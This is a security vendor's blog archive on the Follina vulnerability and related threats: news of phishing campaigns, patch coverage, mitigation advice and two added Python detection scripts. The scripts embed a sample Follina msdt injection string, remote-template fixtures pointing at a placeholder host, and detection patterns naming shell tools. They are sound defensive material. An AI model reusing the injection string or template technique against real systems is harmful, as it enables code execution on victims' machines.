Follina Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/follina/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Feed updated Wed, 12 Apr 2023 23:53:08 +0000.

Top 3 Vulnerabilities of 2023: How to Block and Prevent
https://gridinsoft.com/blogs/top-3-vulnerabilities-block-prevent/
Fri, 07 Apr 2023 18:14:59 +0000

Any successful cyber attack begins with penetrating the target network. Whatever the payload, a stealer, ransomware, or other malware, the attackers first have to get past the network's defenses. According to an expert report, in 2022, 50% of successful infiltrations were performed using previously known vulnerabilities.

Top Vulnerabilities 2023

According to the 2023 cybersecurity report, previously known vulnerabilities disclosed over the past three years remain a concern. Vulnerabilities disclosed in 2022 were used in 24 percent of all cyberattacks, and vulnerabilities disclosed in 2021 in another 18%. That alone refutes the claim that patching and security tooling are pointless: keeping systems updated and protected closes off over 40% of the attack vectors observed. With that in mind, let's look at the most widely exploited vulnerabilities.

ProxyShell

ProxyShell is the name given to a chain of three Microsoft Exchange Server vulnerabilities, CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 (scored under CVSS version 3.1). It is one of several named Exchange exploit chains, alongside ProxyLogon and ProxyNotShell, not a combination of them. Chained together, the three bugs let an unauthenticated attacker execute code remotely on a vulnerable server. Although they were discovered and patched in 2021, they remain among the most exploited vulnerabilities and often lead to significant security breaches.

Figure: The Exchange Server exploit chain.

Follina in Microsoft Office

Microsoft recently disabled, by default, the execution of macros in documents obtained from the internet. That has not stopped attackers: they now use specially crafted .docx and .rtf documents to download and execute malicious code through the Follina vulnerability (CVE-2022-30190, CVSS 7.8) on unpatched systems, deploying Qbot or other malware. Because the exploit goes through the ms-msdt: URI handler rather than through VBA, the malicious code runs even when macros are disabled or the document opens in a protected mode, which made Follina one of the most commonly used vulnerabilities discovered in 2022.

Figure: The general idea of the Follina exploit mechanism.

Fortinet

Two critical bugs in Fortinet products were reported in October and December 2022 (CVSS scores 9.6 and 9.3). The first, CVE-2022-40684, lets an unauthenticated attacker bypass authentication on the administrative interface with specially crafted requests; the second, a heap overflow in the FortiOS SSL-VPN, allows unauthenticated remote code execution. Even though Fortinet issued updates and CISA warned of the significant risk to federal organizations, as of early 2023, 18% of organizations had been hit by attacks exploiting CVE-2022-40684.

Causes

Experts note that attackers most often gain network access and deploy malicious code through Remote Code Execution (RCE) vulnerabilities and Remote Desktop Protocol services left exposed to the internet. Many organizations still run servers without endpoint protection for fear of performance degradation. Moreover, security and network equipment vendors often ship devices with a default login such as admin/password, and some users never change it after the initial configuration, which makes an intruder's job much easier.

How to prevent

Fortunately, these are fixable. Below are some measures you can take to reduce the chance of a successful attack:

  • Install the latest updates. Microsoft patches vulnerabilities as part of its monthly security updates, and we strongly recommend not ignoring them. The same applies to other products, including Microsoft Office and Fortinet software: fixes for all three vulnerabilities above have been available since 2021 and 2022.
  • Change server settings. Restrict access to the Exchange virtual directories so that they are reachable only from the internal network.
  • Review the audit log. Regular review helps you detect attempted attacks and act quickly. Also make sure audit logging is configured to record enough detail about events on the server, including process creation, so that an exploitation attempt leaves a trace.
  • Train your employees. Educating users on security fundamentals is equally important: recognizing phishing, never opening suspicious links or email attachments, and never handing over sensitive data just because someone asks for it.
  • Implement strict security policies and enforce them. This may include prohibiting the use of personal devices (smartphones, tablets and laptops) for work unless they meet your security standards.
  • Limit access to the configuration interface to authenticated users with the necessary permissions, and keep management interfaces off the public internet. This helps prevent unauthorized access to device settings.
  • Use additional security measures such as multi-factor authentication (MFA) to protect access to devices and accounts. This adds a layer of protection even when a password has been stolen.
  • Use solutions like Secure Access Service Edge (SASE). SASE combines security functions such as authentication, authorization and threat protection with network and application access features such as virtual private networks (VPNs) and routing into a single system, providing more effective and convenient protection for the corporate network.
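
The audit-log advice above is most useful with a concrete rule to apply. Below is an added Python example, not code from the Gridinsoft post, that runs a Follina-style hunt over constructed process-creation records (the field names mirror Sysmon Event ID 1, but the line format, paths and command lines are assumptions made for the example): it flags msdt.exe spawned by an Office application or by Explorer through the ms-msdt: URI, a $( ) injection in the IT_BrowseForFile parameter, and sdiagnhost.exe (the troubleshooter host) spawning a shell.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation records (not real Sysmon output). Each line carries the
# three fields of a Sysmon Event ID 1 / Windows 4688 event that matter for this hunt.
SAMPLE_EVENTS = [
    # 0: Word loads a remote template whose HTML invoked ms-msdt: with a $( ) injection
    r'ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; Image=C:\Windows\System32\msdt.exe; CommandLine="C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression(calc))))i/../../../../../../../../Windows/System32/mpsigstub.exe"',
    # 1: the troubleshooter host then runs the injected PowerShell
    r'ParentImage=C:\Windows\System32\sdiagnhost.exe; Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; CommandLine=powershell.exe -nop -w hidden -c calc',
    # 2: Explorer preview pane (RTF variant) reaching msdt through the URI, no injection visible
    r'ParentImage=C:\Windows\explorer.exe; Image=C:\Windows\System32\msdt.exe; CommandLine=msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=C:\Users\alice\app.exe"',
    # 3: benign, a user starts a troubleshooter from Control Panel
    r'ParentImage=C:\Windows\System32\control.exe; Image=C:\Windows\System32\msdt.exe; CommandLine=msdt.exe -id PCWDiagnostic',
    # 4: benign, Word itself being started
    r'ParentImage=C:\Windows\explorer.exe; Image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE; CommandLine=WINWORD.EXE /n report.docx',
]

EVENT_RE = re.compile(r"ParentImage=(?P<parent>.*?); Image=(?P<image>.*?); CommandLine=(?P<cmd>.*)$")
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PREVIEW_HOSTS = {"explorer.exe"}  # the Explorer preview pane triggers the RTF variant
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "rundll32.exe", "regsvr32.exe"}
# $( ) inside the IT_BrowseForFile parameter is the PowerShell injection MSDT evaluated
INJECT_RE = re.compile(r'IT_(?:Re)?BrowseForFile=[^"\r\n]*\$\(', re.I)


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparseable event: {line!r}")
    return ProcEvent(m["parent"], m["image"], m["cmd"])


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a suspicious event, or None if it looks benign."""
    parent, child, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    if child == "msdt.exe":
        if INJECT_RE.search(cmd):
            return "high", "msdt.exe with $( ) in IT_BrowseForFile: Follina-style PowerShell injection"
        if "ms-msdt:" in cmd.lower() and parent in OFFICE_APPS | PREVIEW_HOSTS:
            return "medium", f"msdt.exe launched through the ms-msdt: URI by {parent}"
    if parent == "sdiagnhost.exe" and child in SHELLS:
        return "high", f"sdiagnhost.exe spawned {child}: troubleshooter script running a payload"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Run classify() over raw log lines; returns (line index, severity, reason) per hit."""
    hits = []
    for idx, line in enumerate(lines):
        verdict = classify(parse_event(line))
        if verdict:
            hits.append((idx, verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for idx, sev, why in scan(SAMPLE_EVENTS):
        print(f"[{sev}] event {idx}: {why}")
```

In a real deployment the line parser is replaced by whatever the SIEM already provides; the classification logic is the part worth keeping. The medium-severity rule should be tuned per environment, since a user can legitimately reach msdt.exe through an ms-msdt: link, while the two high-severity rules have no normal business cause.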

Conclusion

In the digital age, the security of software applications and systems has become increasingly crucial as malicious actors constantly look for vulnerabilities to exploit. News of cyberattacks is in the spotlight, and the severity of attacks continues to grow, so everyone needs to strengthen their organization’s security through education, awareness, and training. Cybersecurity threats permeate new environments as technology evolves, but many threats will remain the same. Therefore, continuous assessment of processes, people, and systems is necessary for organizations to be prepared and operationally resilient. By using the knowledge of ethical hackers, conducting regular testing, and using automation, organizations can be better ready for potential threats.

Russian Hackers Use Follina Vulnerability to Attack Users in Ukraine
https://gridinsoft.com/blogs/russian-hackers-use-follina/
Thu, 23 Jun 2022 10:02:07 +0000

The Ukraine Computer Emergency Response Team (CERT-UA) said Russian hackers are exploiting the Follina vulnerability in new phishing campaigns to install CredoMap malware and Cobalt Strike beacons.

According to experts, the APT28 hacker group (also tracked as Strontium, Fancy Bear and Sofacy) is sending out emails with a malicious document named "Nuclear Terrorism Is a Real Threat.rtf".

The hackers chose this topic to encourage the recipient to open the document, as fear of a potential nuclear attack is common among Ukrainians.

Let me remind you that we reported that hacker groups have split up, some supporting Russia and others Ukraine, and also that the war in Ukraine triggered a stream of amateurish ransomware.

The RTF document exploits the CVE-2022-30190 (Follina) vulnerability to download and run the CredoMap malware (docx.exe) on the victim’s device.

According to a Malwarebytes report, the payload is an infostealer that harvests credentials and cookies from the Chrome, Edge and Firefox browsers. The malware then exfiltrates the stolen data over the IMAP email protocol to its C2 server, which is hosted on an abandoned website in Dubai.

CERT-UA also identified a second campaign exploiting CVE-2022-30190, attributed to the actor it tracks as UAC-0098.

CERT-UA reported that the threat actor used a DOCX file named "Penalty.docx", and that the payload fetched from the remote resource was a Cobalt Strike beacon (ked.dll) with a very recent compilation date.

The e-mails sent out allegedly come from the State Tax Service of Ukraine.

"It was established in mutual coordination with the subject that the DOCX document was hidden in the password-protected archive 'Imposition of Penalty Sanctions.zip' (email subject: 'Information about non-payment of tax')," CERT-UA specialists report.

Due to Russia’s invasion of Ukraine, many citizens have temporarily stopped paying taxes to the state, so the bait can be effective against many Ukrainians.

CERT-UA advised employees of organizations to remain vigilant about phishing emails as the number of spear phishing attacks remains high.

Microsoft Fixed Follina Vulnerability and 55 Other Bugs
https://gridinsoft.com/blogs/microsoft-fixes-follina-vulnerability/
Fri, 17 Jun 2022 11:54:05 +0000

As part of the June Patch Tuesday, Microsoft finally fixed the critical Follina vulnerability in the Windows Support Diagnostic Tool (MSDT), along with 55 other bugs in its products.

As a reminder, Follina (CVE-2022-30190) is a remote code execution issue in the Microsoft Windows Support Diagnostic Tool (MSDT) and affects all versions of Windows that receive security updates (that is, Windows 7 and above and Server 2008 and above). For several weeks now, the vulnerability has been under active attack by hackers.

Recall also that we wrote that, for example, Trojan Qbot Took Advantage of the Famous Follina Vulnerability.

Attackers used the 0-day to execute arbitrary code with the privileges of the calling application, and from there to install programs, view, modify or delete data, and create new Windows accounts, depending on the rights of the compromised user.

"The vulnerability could be exploited to execute arbitrary code by opening a Word document normally or by previewing it in File Explorer, running malicious PowerShell commands through MSDT," security experts warned back in May.

And while the update does not stop Microsoft Office from automatically loading URI handlers without user interaction, it does block the PowerShell injection through MSDT, shutting down this attack vector.

In addition to the long-awaited patch for Follina, Microsoft developers have submitted fixes for another 55 vulnerabilities, three of which were classified as "critical" because they allow arbitrary code execution remotely: CVE-2022-30136 (RCE in Windows NFS), CVE-2022-30163 (RCE in Windows Hyper-V) and CVE-2022-30139 (RCE in Windows LDAP). Five more bugs have been fixed separately in the Microsoft Edge browser.

It is worth noting that the most serious of the three critical vulnerabilities, CVE-2022-30136, received a score of 9.8 out of 10 on the CVSS scale. The issue affects the Windows Network File System (NFS). Microsoft rates exploitation as likely and explains that an attacker who has already reached the victim's network can make an unauthenticated, specially crafted call to the NFS service to achieve remote code execution.

Trojan Qbot Took Advantage of the Famous Follina Vulnerability
https://gridinsoft.com/blogs/qbot-and-the-follina-vulnerability/
Sat, 11 Jun 2022 10:03:46 +0000

The researchers warned that the Qbot malware is already exploiting an unpatched zero-day vulnerability in Windows MSDT called Follina.

Let me remind you that the discovery of Follina became known at the end of May, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem.

The vulnerability is tracked as CVE-2022-30190 and can be exploited to execute arbitrary code by simply opening a Word document or previewing it in File Explorer: the document causes the Microsoft Support Diagnostic Tool (MSDT) to run attacker-supplied PowerShell commands.

The bug affects all versions of Windows that receive security updates, that is, Windows 7 and later, as well as Server 2008 and later.

Let me remind you that we wrote that Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster.

Experts had previously warned that the vulnerability is being exploited by Chinese hackers and is being used in attacks on European governments and municipal authorities in the United States. Now Proofpoint researchers report that the Qbot malware has also begun using malicious Microsoft Office documents (.docx) that abuse CVE-2022-30190 to infect recipients of phishing emails.

The attack emails carry HTML attachments that download ZIP archives containing a disk image (.img). Inside the image, the victim finds a DLL, a Word document, and a shortcut (.lnk).

The shortcut simply runs the Qbot DLL already present in the image. The otherwise empty .docx document, on the other hand, contacts an external server to download an HTML file that exploits the Follina vulnerability to run PowerShell code, which in turn downloads and executes a second Qbot DLL payload.

Indicators of Compromise related to this campaign are available from Proofpoint.

The researchers believe that the use of two different infection methods indicates that hackers are conducting an A/B testing campaign to evaluate which tactics will give the best results.

Microsoft Is in No Hurry to Fix the Follina Vulnerability, Which Has Become a Real Disaster
https://gridinsoft.com/blogs/microsoft-is-in-no-hurry-to-fix-follina/
Thu, 09 Jun 2022 13:35:21 +0000

Hackers are actively exploiting the critical 0-day Follina vulnerability, which Microsoft is in no hurry to fix.

Researchers warn that European governments and municipalities in the US have been targeted by a phishing campaign using malicious RTF documents.

Let me remind you that the discovery of Follina became known at the end of May, although the first researchers discovered the bug back in April 2022, but then Microsoft refused to acknowledge the problem.

The vulnerability is tracked as CVE-2022-30190 and can be exploited to execute arbitrary code by simply opening a Word document or previewing it in File Explorer: the document causes the Microsoft Support Diagnostic Tool (MSDT) to run attacker-supplied PowerShell commands.

The bug affects all versions of Windows that receive security updates, i.e. Windows 7 and later, as well as Server 2008 and later.

Worse, the vulnerability is in many ways similar to the PrintNightmare problem, which Microsoft was unable to fix for quite some time: Follina has likewise led to the discovery of related bugs, the exploitation of which can be no less serious.

We have already written that Chinese hackers are actively using the fresh 0-day, and experts warned that more such attacks would follow. Unfortunately, those predictions turned out to be correct: Proofpoint analysts now report that they have discovered a phishing campaign aimed at government agencies in Europe and municipal authorities in the United States, which affected at least 10 of the company's customers. According to the researchers, state-sponsored hackers are behind these attacks.

To lure potential victims into opening the decoy document, the attackers used the theme of a pay increase. Opening the document deployed a PowerShell script that first checked whether the system was a virtual machine, then stole information from multiple browsers, email clients and file-transfer tools, collected system information, and transferred the data to a server controlled by the attackers.

According to Bleeping Computer, the payload collected a lot of data from a wide variety of applications, including:

  1. passwords from browsers: Google Chrome, Mozilla Firefox, Microsoft Edge, Opera, Yandex, Vivaldi, CentBrowser, Comodo, CheDot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc and AVAST Browser;
  2. data from other applications: Mozilla Thunderbird, Netsarang session files, Windows Live Mail contacts, Filezilla passwords, ToDesk configuration file, WeChat, Oray SunLogin RemoteClient, MailMaster, ServU, Putty, FTP123, WinSCP, RAdmin, Microsoft Office, Navicat;
  3. system information: computer information, list of usernames, Windows domain information.

Most of the attacks are reported to have been in the United States, as well as Brazil, Mexico and Russia.

Since there is still no patch for Follina, administrators and users can block attacks on CVE-2022-30190 by disabling the ms-msdt: URI protocol handler, which attackers use to launch troubleshooters and execute code on vulnerable systems (Microsoft's workaround is to export the HKEY_CLASSES_ROOT\ms-msdt registry key as a backup and then delete it). It is also officially recommended to disable file previews in Windows Explorer, because the attack is possible that way as well.

In the absence of an official patch, an unofficial one has already appeared from 0patch. 0patch is a platform designed precisely for such situations: fixing 0-days and other unpatched vulnerabilities, supporting products that their vendors no longer support, custom software, and so on.

Unofficial patches are provided for Windows 11 v21H2, Windows 10 (1803 to 21H2), Windows 7 and Windows Server 2008 R2. Moreover, instead of disabling MSDT as Microsoft recommends, the 0patch specialists added sanitization of the user-supplied path, which also prevents the bug from being exploited.

"Please note, it doesn't matter which version of Office you have installed, or if you have it installed at all. The vulnerability can also be exploited through other attack vectors. That's why we released a patch for Windows 7 where the ms-msdt: URL handler isn't registered at all," writes 0patch co-founder Mitja Kolsek.

Meanwhile, information security experts are already beginning to criticize Microsoft for its sluggishness and lack of fixes.

"Small security teams generally see Microsoft's sloppiness as a sign that it's 'just another vulnerability,' but it's definitely not. It's not clear why Microsoft continues to downplay this vulnerability, which is already being exploited in real attacks. It definitely doesn't help the security teams," said Jake Williams, principal cyber threat analyst at Scythe.

Chinese Hackers Attack Fresh 0-day Follina Vulnerability
https://gridinsoft.com/blogs/follina-0-day-vulnerability/
Fri, 03 Jun 2022 10:32:03 +0000

Experts have warned that Chinese hackers are already actively exploiting a 0-day vulnerability in Microsoft Office known as Follina to remotely execute malicious code on vulnerable systems.

Let me remind you that the discovery of Follina became known a few days ago, although researchers first found the bug back in April 2022, when Microsoft declined to acknowledge the problem. The vulnerability is now tracked as CVE-2022-30190 and can be exploited by simply opening a Word document or previewing it in File Explorer, which makes the Microsoft Support Diagnostic Tool (MSDT) execute malicious PowerShell commands.

The bug affects all versions of Windows that receive security updates, that is, Windows 7 and later, as well as Server 2008 and later.

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products.

Experts had already noted that the discovery of Follina is a very worrying signal, because the vulnerability opens a new attack vector through Microsoft Office: the bug works without elevated privileges, allows Windows Defender to be bypassed, and does not require macros to be enabled in order to execute binaries or scripts.

As Proofpoint experts now report, the Chinese state-sponsored group TA413 has already taken advantage of Follina, targeting the international Tibetan community.

Attackers distribute ZIP archives to victims that contain malicious Word documents designed to attack CVE-2022-30190. The decoys are disguised as messages from the Central Tibetan Administration and use the tibet-gov.web[.]app domain.

Well-known information security researcher MalwareHunterTeam also reports finding DOCX documents with Chinese file names that deliver malicious payloads through the http://coolrat[.]xyz domain, including password-stealing malware.

Since there is no patch for Follina yet, administrators and users can block attacks on CVE-2022-30190 by disabling the ms-msdt: URI protocol handler, which attackers use to launch troubleshooters and execute code on vulnerable systems. It is also recommended to disable file preview in Windows Explorer, because the attack is possible that way as well.

Attackers Are Already Exploiting the Fresh 0-day Follina Bug in Microsoft Office
https://gridinsoft.com/blogs/follina-in-microsoft-office/
Wed, 01 Jun 2022 14:53:00 +0000

Security researchers recently discovered a zero-day vulnerability in Microsoft Office dubbed Follina. The bug can be exploited through the normal opening of a Word document, using it to execute malicious PowerShell commands through the Microsoft Diagnostic Tool (MSDT).

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products, and also that Microsoft Has Not Fully Coped with PetitPotam Attacks in Windows NTLM Relay.

The discovery of Follina is a very worrying sign, because the vulnerability opens a new attack vector through Microsoft Office: the bug works without elevated privileges, allows Windows Defender to be bypassed, and does not require macros to be enabled in order to execute binaries or scripts.

The first malicious Word document exploiting this bug was discovered by the security researcher nao_sec, who spotted a file uploaded to VirusTotal from a Belarusian IP address. Apparently, attacks exploiting this problem began as early as April 2022, with the hackers using fake interview invitations and sextortion as lures.

"I searched VirusTotal for files that would exploit the CVE-2021-40444 vulnerability. I then discovered a file that was abusing the ms-msdt scheme. It used a Word external link to load the HTML, and after that the ms-msdt scheme to execute the PowerShell code," says the researcher.

Well-known security expert Kevin Beaumont studied his colleague's find, decoded the payload and explained in his blog that it is a command-line string that Microsoft Word hands to MSDT for execution, even if macros are disabled. Beaumont elaborates that the malicious Word document uses the remote template feature to download an HTML file from a server. That HTML then uses the ms-msdt: URI scheme to load additional code and execute PowerShell.

Normally a document from an untrusted source opens in Protected View, which warns about files from potentially unsafe sources, but according to Beaumont this warning can be bypassed by delivering the exploit as a Rich Text Format (RTF) file: the malicious code then runs "even without opening the document, that is, through the preview in Explorer."
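
The chain Beaumont describes (a remote template relationship inside the .docx, HTML that navigates to an ms-msdt: URI with PowerShell injected through the IT_BrowseForFile parameter, and the RTF variant that fires on preview) leaves a checkable artifact at each stage. The following Python script is an added example, not code from this post or from the researchers it cites: it scans a .docx for External relationships, classifies fetched HTML, and looks for a remote template in RTF. The sample files it builds inline are minimal constructed stand-ins (not complete Word files and not real campaign artifacts), and the example.invalid URLs are placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

PKG_RELS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_RELS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Stage 1: a .docx is a zip of XML parts. A remote template is a relationship of type
# attachedTemplate with TargetMode="External" and an http(s) Target, normally in
# word/_rels/settings.xml.rels. Hyperlinks are External too, so they are filtered out.
def external_relationships(docx_bytes: bytes) -> List[Tuple[str, str, str]]:
    """Return (rels part, short relationship type, target) for every External relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{PKG_RELS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((part, rtype, rel.get("Target", "")))
    return found


def docx_findings(docx_bytes: bytes) -> List[str]:
    findings = []
    for part, rtype, target in external_relationships(docx_bytes):
        if rtype == "hyperlink" or not re.match(r"(?i)https?://", target):
            continue
        label = "remote template" if rtype == "attachedTemplate" else f"external {rtype}"
        findings.append(f"{part}: {label} {target}")
    return findings


# Stage 2: the HTML fetched as the "template" navigates to an ms-msdt: URI. A $( in the
# IT_BrowseForFile parameter is the PowerShell injection that made Follina exploitable.
MSDT_URI_RE = re.compile(r"ms-msdt:", re.I)
INJECT_RE = re.compile(r'IT_(?:Re)?BrowseForFile=[^"\r\n]*\$\(', re.I)


def html_verdict(html: str) -> str:
    if INJECT_RE.search(html):
        return "follina-injection"
    if MSDT_URI_RE.search(html):
        return "msdt-uri"
    return "clean"


# Stage 3: the RTF variant carries the same remote template as {\*\template URL} and
# fires from the Explorer preview pane without the file being opened.
RTF_TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s+https?://[^}\s]+", re.I)


def rtf_remote_template(rtf: bytes) -> Optional[str]:
    m = RTF_TEMPLATE_RE.search(rtf)
    return m.group(0).decode("ascii", "replace") if m else None


# ---- constructed samples (placeholders, not real campaign artifacts) ----
def build_docx(template_target: Optional[str] = None) -> bytes:
    """Minimal zip with only the parts the scanner reads; not a complete Word file."""
    doc_rels = (f'<Relationship Id="rId1" Type="{OFFICE_RELS}/hyperlink" '
                f'Target="https://example.invalid/benign" TargetMode="External"/>')
    settings_rels = ""
    if template_target:
        settings_rels = (f'<Relationship Id="rId1" Type="{OFFICE_RELS}/attachedTemplate" '
                         f'Target="{template_target}" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml",
                   "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{PKG_RELS}">{doc_rels}</Relationships>')
        z.writestr("word/_rels/settings.xml.rels",
                   f'<Relationships xmlns="{PKG_RELS}">{settings_rels}</Relationships>')
    return buf.getvalue()


SAMPLE_HTML = (
    '<html><body><script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression(calc))'
    'i/../../../../../../../../Windows/System32/mpsigstub.exe\\"";</script></body></html>'
)
SAMPLE_RTF = b"{\\rtf1\\ansi{\\*\\template http://example.invalid/remote.html!}{\\pard hello\\par}}"

if __name__ == "__main__":
    print(docx_findings(build_docx("http://example.invalid/remote.html!")))
    print(html_verdict(SAMPLE_HTML), rtf_remote_template(SAMPLE_RTF))
```

The .docx check catches the delivery stage before any network fetch happens: the template URL is only resolved when Word opens the file, so scanning the relationship parts of inbound attachments is cheap and works on the file alone. The HTML and RTF checks are signature-style and will miss obfuscated variants; they are meant to confirm a suspicious attachment, not to replace patching or the handler workaround.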

According to Bleeping Computer, many information security specialists have already studied the found malicious document and successfully reproduced the exploit on several versions of Microsoft Office. As a result, the researchers confirmed the presence of a vulnerability in Office 2013, 2016, Office Pro Plus April version (Windows 11 with May updates) and Office 2021 version with all patches.

According to experts, an attacker can use such an exploit to access various places on the victim’s network. Depending on the payload, the attacker can collect password hashes from the victim’s Windows machines, which can be useful for further post-exploitation.

A detailed technical description of the exploit is already available on the Huntress blog.

Interestingly, it now turns out that the Follina vulnerability was discovered back in April of this year, and Microsoft has already been notified about it.

According to screenshots posted by crazyman, a member of the Shadow Chaser Group (an association of college students who search for and analyze APT activity), Microsoft was informed about the vulnerability but considered it "a non-security issue". Microsoft argued that msdt.exe did run, but that it required a password to proceed, and that the company was unable to reproduce the exploit.

Now Microsoft has acknowledged that the problem is still related to security: the vulnerability has already received the identifier CVE-2022-30190, and it is reported that the bug affects all versions of Windows that receive security updates, that is, Windows 7 and newer, as well as Server 2008 and newer.

"An attacker who successfully exploited this vulnerability could run arbitrary code with the privileges of the calling application. The attacker could then install programs, view, change or delete data, and create new accounts in the context of the rights of the current user," Microsoft experts warn in a blog post.

Since there is no patch yet, administrators and users can block attacks on CVE-2022-30190 by disabling the ms-msdt: URI protocol handler, which attackers use to launch troubleshooters and execute code on vulnerable systems.

Although Microsoft Defender version 1.367.719.0 already detects exploitation attempts by signature, and Protected View and Application Guard in Microsoft Office should block attacks, security experts warn that these protections are powerless if the attack is carried out through the Explorer preview pane rather than by opening the document. It is therefore also recommended to disable previews in Windows Explorer.
